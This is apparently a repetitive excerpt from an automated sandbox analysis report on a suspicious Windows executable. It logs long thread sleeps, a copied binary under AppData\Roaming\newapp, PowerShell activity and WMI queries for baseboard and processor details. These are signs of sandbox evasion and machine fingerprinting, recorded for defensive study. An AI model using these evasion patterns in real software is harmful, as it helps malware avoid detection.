Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597155
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597046
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596280
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596121
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595797
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595562
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595343
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595125
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594797
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594672
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594562
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594453

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7106	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2557	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Window / User API: threadDelayed 3093	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Window / User API: threadDelayed 6743	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window / User API: threadDelayed 6630	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window / User API: threadDelayed 3206	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window / User API: threadDelayed 3997
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window / User API: threadDelayed 5853

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7372	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7844	Thread sleep count: 3093 > 30	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -599812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -599664s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -599365s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7844	Thread sleep count: 6743 > 30	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -599123s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -597358s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -597029s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -596915s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -596801s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -596343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -596233s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -595468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -594919s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -594576s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -594329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -594207s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836	Thread sleep time: -594078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8008	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8176	Thread sleep count: 6630 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8176	Thread sleep count: 3206 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -599341s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -598988s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -596563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -596232s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -596016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -594891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -594562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -594450s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172	Thread sleep time: -594338s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2144	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep count: 3997 > 30
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -599888s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644	Thread sleep count: 5853 > 30
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -598999s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -598834s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -598685s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -598578s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -598468s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -598358s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -598250s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -598140s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -598031s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -597920s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -597812s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -597703s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -597593s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -597484s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -597375s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -597265s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -597155s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -597046s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -596718s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -596280s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -596121s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -596015s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -595797s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -595672s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -595562s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -595453s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -595343s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -595234s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -595125s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -595015s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -594906s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -594797s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -594672s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -594562s >= -30000s
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640	Thread sleep time: -594453s >= -30000s

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 599812	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 599664	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 599365	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 599123	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 597029	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596915	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596801	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596233	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595140	Jump to behavior
